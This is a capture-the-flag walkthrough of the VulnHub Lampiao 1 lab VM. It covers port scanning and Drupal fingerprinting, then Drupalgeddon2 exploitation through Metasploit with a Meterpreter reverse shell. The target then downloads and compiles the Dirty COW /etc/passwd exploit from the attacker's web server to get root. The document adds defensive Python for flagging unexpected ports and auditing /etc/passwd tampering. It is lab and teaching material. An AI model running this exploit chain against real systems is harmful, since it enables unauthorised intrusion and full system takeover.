Background:
Download: https://www.vulnhub.com/entry/lampiao-1,249/
The target machine's IP address in this run is 192.168.2.230.
Technical points:
Use nmap for live host discovery with the command nmap -sP 192.168.2.0/24; the scan results are as follows.
└─$ sudo nmap -sP 192.168.2.0/24
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-07 11:27 CST
Stats: 0:00:02 elapsed; 0 hosts completed (0 up), 255 undergoing ARP Ping Scan
ARP Ping Scan Timing: About 22.16% done; ETC: 11:27 (0:00:07 remaining)
Stats: 0:00:03 elapsed; 0 hosts completed (0 up), 255 undergoing ARP Ping Scan
ARP Ping Scan Timing: About 100.00% done; ETC: 11:27 (0:00:00 remaining)
Nmap scan report for 192.168.2.2
Host is up (0.21s latency).
MAC Address: EC:3C:BB:AE:B7:45 (Huawei Device)
Nmap scan report for 192.168.2.45
Host is up (0.11s latency).
MAC Address: 42:63:96:C3:0E:82 (Unknown)
……
Nmap scan report for 192.168.2.230
Host is up (0.00033s latency).
MAC Address: 00:0C:29:B8:50:AD (VMware)
From the MAC address (VMware) we can tell that the target's IP address is 192.168.2.230.
Use nmap to scan the target's open ports with the command nmap -p 1-65535 -sS -Pn 192.168.2.230; the scan gives the following result:
└─$ sudo nmap -p 1-65535 -sS -Pn 192.168.2.230
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-07 12:18 CST
Nmap scan report for 192.168.2.230
Host is up (0.00093s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
1898/tcp open cymtec-port
MAC Address: 00:0C:29:B8:50:AD (VMware)
Nmap done: 1 IP address (1 host up) scanned in 8.91 seconds
From the scan results, the target has three open ports: 22, 80 and 1898.
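The two scans above (the ARP ping sweep and the full TCP port scan) are the raw material for an asset inventory. The following is an added example, not code from the original writeup: it parses nmap's human-readable output into host records, picks hosts out by MAC vendor (the way the text identifies the VMware target), and reports open ports that fall outside an approved baseline. The two samples are constructed from the scan output shown in the text, and the baseline of 22/tcp and 80/tcp is an assumption.

```python
"""Parse nmap's normal (human-readable) output into host records and flag open
ports that are outside an approved baseline. Added example, not code from the
original writeup; the two samples are constructed from the scan output shown
in the text, and the baseline {22/tcp, 80/tcp} is an assumption."""
import re
from dataclasses import dataclass, field

# Constructed sample 1: the ARP ping sweep (nmap -sP 192.168.2.0/24).
SAMPLE_DISCOVERY = """\
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-07 11:27 CST
Nmap scan report for 192.168.2.2
Host is up (0.21s latency).
MAC Address: EC:3C:BB:AE:B7:45 (Huawei Device)
Nmap scan report for 192.168.2.45
Host is up (0.11s latency).
MAC Address: 42:63:96:C3:0E:82 (Unknown)
Nmap scan report for 192.168.2.230
Host is up (0.00033s latency).
MAC Address: 00:0C:29:B8:50:AD (VMware)
"""

# Constructed sample 2: the full TCP port scan of the target.
SAMPLE_PORT_SCAN = """\
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-07 12:18 CST
Nmap scan report for 192.168.2.230
Host is up (0.00093s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
1898/tcp open  cymtec-port
MAC Address: 00:0C:29:B8:50:AD (VMware)
Nmap done: 1 IP address (1 host up) scanned in 8.91 seconds
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
MAC_RE = re.compile(r"^MAC Address: ([0-9A-Fa-f:]{17}) \((.*)\)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")


@dataclass
class Host:
    addr: str
    mac: str = ""
    vendor: str = ""
    # (port, proto) -> (state, service)
    ports: dict = field(default_factory=dict)


def parse_nmap(text):
    """Return one Host per 'Nmap scan report' block, with MAC/vendor and ports."""
    hosts, cur = [], None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            cur = Host(addr=m.group(1))
            hosts.append(cur)
            continue
        if cur is None:
            continue
        m = MAC_RE.match(line)
        if m:
            cur.mac, cur.vendor = m.group(1).upper(), m.group(2)
            continue
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service = m.groups()
            cur.ports[(int(port), proto)] = (state, service)
    return hosts


def hosts_by_vendor(hosts, vendor_substring):
    """Hosts whose MAC vendor string contains the given text (e.g. 'VMware')."""
    return [h for h in hosts if vendor_substring.lower() in h.vendor.lower()]


def unexpected_open_ports(host, baseline):
    """Open (port, proto) pairs on the host that are not in the approved baseline."""
    return sorted(k for k, (state, _) in host.ports.items()
                  if state == "open" and k not in baseline)


if __name__ == "__main__":
    vms = hosts_by_vendor(parse_nmap(SAMPLE_DISCOVERY), "VMware")
    print("VMware hosts:", [h.addr for h in vms])
    for h in parse_nmap(SAMPLE_PORT_SCAN):
        extra = unexpected_open_ports(h, {(22, "tcp"), (80, "tcp")})
        print(h.addr, "open ports outside baseline:", extra)
```

Run against the sample, the only host outside the baseline is 192.168.2.230 with 1898/tcp, which is exactly the port the rest of the writeup turns on; in practice the same parser is fed the output of a scheduled scan of your own ranges so that a service nobody approved shows up before someone else finds it. For machine-readable output, nmap's -oX (XML) is the more robust input, but the text format is what most writeups and tickets contain.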
Use dirb to brute-force directories on the target, scanning ports 80 and 1898 separately; port 1898 turns out to have directories that may be worth exploiting.
└─$ sudo dirb http://192.168.2.230:1898/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Dec 7 12:44:48 2021
URL_BASE: http://192.168.2.230:1898/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.2.230:1898/ ----
==> DIRECTORY: http://192.168.2.230:1898/includes/
+ http://192.168.2.230:1898/index.php (CODE:200|SIZE:11423)
==> DIRECTORY: http://192.168.2.230:1898/misc/
==> DIRECTORY: http://192.168.2.230:1898/modules/
==> DIRECTORY: http://192.168.2.230:1898/profiles/
+ http://192.168.2.230:1898/robots.txt (CODE:200|SIZE:2189)
==> DIRECTORY: http://192.168.2.230:1898/scripts/
+ http://192.168.2.230:1898/server-status (CODE:403|SIZE:295)
==> DIRECTORY: http://192.168.2.230:1898/sites/
==> DIRECTORY: http://192.168.2.230:1898/themes/
+ http://192.168.2.230:1898/web.config (CODE:200|SIZE:2200)
+ http://192.168.2.230:1898/xmlrpc.php (CODE:200|SIZE:42) ……
-----------------
END_TIME: Tue Dec 7 12:44:56 2021
DOWNLOADED: 4612 - FOUND: 5
So the site has the following directories: http://192.168.2.230:1898/includes/, http://192.168.2.230:1898/misc/, http://192.168.2.230:1898/modules/, http://192.168.2.230:1898/profiles/, http://192.168.2.230:1898/scripts/, http://192.168.2.230:1898/sites/ and http://192.168.2.230:1898/themes/.
Use the Yujian (御剑) web fingerprinting tool to fingerprint the site: add http://192.168.2.230:1898 as the target and scan; the application is identified as Drupal.
This does not reveal the CMS version, though, so we use CMSeek to probe for it with the command python3 cmseek.py -u 192.168.2.230:1898, which reports Drupal 7.
Use httprint to fingerprint the web server; it identifies Apache/2.4.7 (Ubuntu).
Use nmap for service version detection on the target port with the command nmap -sV -p 1898 192.168.2.230; the result shows Apache listening on port 1898, version Apache httpd 2.4.7 ((Ubuntu)).
From step three we also learn that the target operating system is Ubuntu.
Searching for vulnerabilities affecting Drupal 7 turns up CVE-2018-7600, a code execution vulnerability in Drupal 7.x, so we try to exploit it with msf.
┌──(root㉿kali)-[/home/hehao/桌面/CMSeeK]
└─# msfdb run // start msf
[+] Starting database
=[ metasploit v6.0.45-dev ]
+ -- --=[ 2134 exploits - 1139 auxiliary - 364 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: View all productivity tips with the
tips command
[*] Starting persistent handler(s)...
msf6 > search CVE:2018-7600 // search for exploits matching CVE-2018-7600
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/drupal_drupalgeddon2
msf6 > use exploit/unix/webapp/drupal_drupalgeddon2 // select this exploit module
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options // view the module options
Module options (exploit/unix/webapp/drupal_drupalgeddon2):
Name Current Setting Required Description
---- --------------- -------- -----------
DUMP_OUTPUT false no Dump payload command output
PHP_FUNC passthru yes PHP function to execute
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path to Drupal install
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.2.253 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic (PHP In-Memory)
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 192.168.2.230 // set the target IP
RHOSTS => 192.168.2.230
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RPORT 1898 // set the target port
RPORT => 1898
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run // run the module and start the attack
[*] Started reverse TCP handler on 192.168.2.253:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable.
[*] Sending stage (39282 bytes) to 192.168.2.230
[*] Meterpreter session 1 opened (192.168.2.253:4444 -> 192.168.2.230:54384) at 2021-12-08 16:13:52 +0800
meterpreter > shell // drop into a shell
Shell obtained!
Next, upgrade to an interactive shell. The shell we obtained is not fully interactive; on a system that has python installed we can use python's pty module, and a single line creates a native terminal. In the shell, run python -c 'import pty; pty.spawn("/bin/bash")'.
Continue gathering information: uname -a returns Linux lampiao 4.4.0-31-generic. The Linux kernel version here is 4.4.0, so Dirty COW can be used to escalate privileges.
On the Kali attacking machine, search for the matching exploit and start an HTTP server in the current directory to transfer it to the target.
└─# searchsploit dirty // search for the exploit
-------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (1) | linux/dos/43199.c
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2) | linux/dos/44305.c
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege E | linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation | linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Access Method | linux/local/40838.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalati | linux/local/40839.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method) | linux/local/40611.c
Qualcomm Android - Kernel Use-After-Free via Incorrect set_page_dirty() in KGSL | android/dos/46941.txt
Quick and Dirty Blog (qdblog) 0.4 - 'categories.php' Local File Inclusion | php/webapps/4603.txt
Quick and Dirty Blog (qdblog) 0.4 - SQL Injection / Local File Inclusion | php/webapps/3729.txt
snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (1) | linux/local/46361.py
snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (2) | linux/local/46362.py
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(root㉿kali)-[/home/hehao/桌面]
└─# searchsploit -m 40847.cpp // the -m option copies 40847.cpp into the current directory
Exploit: Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)
URL: https://www.exploit-db.com/exploits/40847
Path: /usr/share/exploitdb/exploits/linux/local/40847.cpp
File Type: C++ source, ASCII text, with CRLF line terminators
Copied to: /home/hehao/桌面/40847.cpp
┌──(root㉿kali)-[/home/hehao/桌面]
└─# python3 -m http.server 8888 // start an HTTP server in the current directory to serve the file
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
192.168.2.252 - - [08/Dec/2021 16:46:12] "GET /40847.cpp HTTP/1.1" 200 -
In the shell on the target, download the remote file, compile and run it to obtain root, then change to the root directory and read the flag:
www-data@lampiao:/var/www/html$ wget http://192.168.2.253:8888/40847.cpp // download the remote file
wget http://192.168.2.253:8888/40847.cpp
--2021-12-08 06:46:11-- http://192.168.2.253:8888/40847.cpp
Connecting to 192.168.2.253:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10531 (10K) [text/x-c++src]
Saving to: '40847.cpp'
100%[======================================>] 10,531 --.-K/s in 0s
2021-12-08 06:46:11 (100 MB/s) - '40847.cpp' saved [10531/10531]
www-data@lampiao:/var/www/html$ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil // compile into a binary named dcow
/proc/sys/vm/dirty_writeback_centisecs
root@lampiao:~# cp /tmp/.ssh_bak /etc/passwd
root@lampiao:~# rm /tmp/.ssh_bak
root@lampiao:~# whoami // check current privileges
whoami
root
root@lampiao:~# cd /root // change to the root directory
cd /root
root@lampiao:~# ls
ls
flag.txt
root@lampiao:~# cat flag.txt // read the flag
cat flag.txt
9740616875908d91ddcdaa8aea3af366
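The exploit used above is the "/etc/passwd method" variant from the searchsploit listing, and the transcript shows it keeping a copy of the original file in /tmp/.ssh_bak and restoring it afterwards. A tampered /etc/passwd is one of the easiest post-exploitation artefacts to catch: an extra UID 0 entry, or a password hash sitting in passwd instead of the 'x' that defers to /etc/shadow. The following is an added example, not code from the original writeup, that parses passwd, applies those two checks, and diffs the file against a saved baseline. Both passwd samples are constructed.

```python
"""Audit /etc/passwd for the kind of tampering a '/etc/passwd method' privilege
escalation performs: an extra UID-0 entry, or a password hash stored in passwd
instead of the 'x' that defers to /etc/shadow. Also diffs against a saved
baseline so any added, removed or changed account is reported. Added example,
not part of the original writeup; both passwd samples are constructed."""

# Constructed baseline: the file as captured when the host was built.
BASELINE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000:Alice,,,:/home/alice:/bin/bash
"""

# Constructed current file: root's 'x' replaced by an inline hash, one extra UID-0 user.
CURRENT = """\
root:$6$CONSTRUCTED$notarealhash:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000:Alice,,,:/home/alice:/bin/bash
svc:x:0:0::/:/bin/bash
"""

# Values in the password field that mean "no hash stored here".
NO_HASH_MARKERS = {"x", "*", "!", "!!"}


def parse_passwd(text):
    """Map user name -> fields; rejects malformed lines rather than guessing."""
    users = {}
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        f = line.split(":")
        if len(f) != 7:
            raise ValueError(f"line {n}: expected 7 fields, got {len(f)}")
        users[f[0]] = {"pw": f[1], "uid": int(f[2]), "gid": int(f[3]),
                       "gecos": f[4], "home": f[5], "shell": f[6]}
    return users


def audit_passwd(current_text, baseline_text):
    """Return a list of human-readable findings; empty means nothing suspicious."""
    cur, base = parse_passwd(current_text), parse_passwd(baseline_text)
    findings = []
    for name, u in cur.items():
        if u["uid"] == 0 and name != "root":
            findings.append(f"extra UID-0 account: {name}")
        if u["pw"] == "":
            findings.append(f"empty password for {name}")
        elif u["pw"] not in NO_HASH_MARKERS:
            findings.append(f"password hash stored in passwd for {name}")
    for name in sorted(set(cur) - set(base)):
        findings.append(f"added account: {name}")
    for name in sorted(set(base) - set(cur)):
        findings.append(f"removed account: {name}")
    for name in sorted(set(cur) & set(base)):
        if cur[name] != base[name]:
            findings.append(f"changed entry: {name}")
    return findings


if __name__ == "__main__":
    for finding in audit_passwd(CURRENT, BASELINE):
        print(finding)
```

The baseline comparison is what makes this usable beyond the two textbook checks: a file integrity tool such as AIDE does the same job for the whole filesystem, and the backup-and-restore dance visible in the transcript (cp /tmp/.ssh_bak /etc/passwd) means the file's modification time and a hash of its contents both change twice, which is worth alerting on even if the final contents look normal.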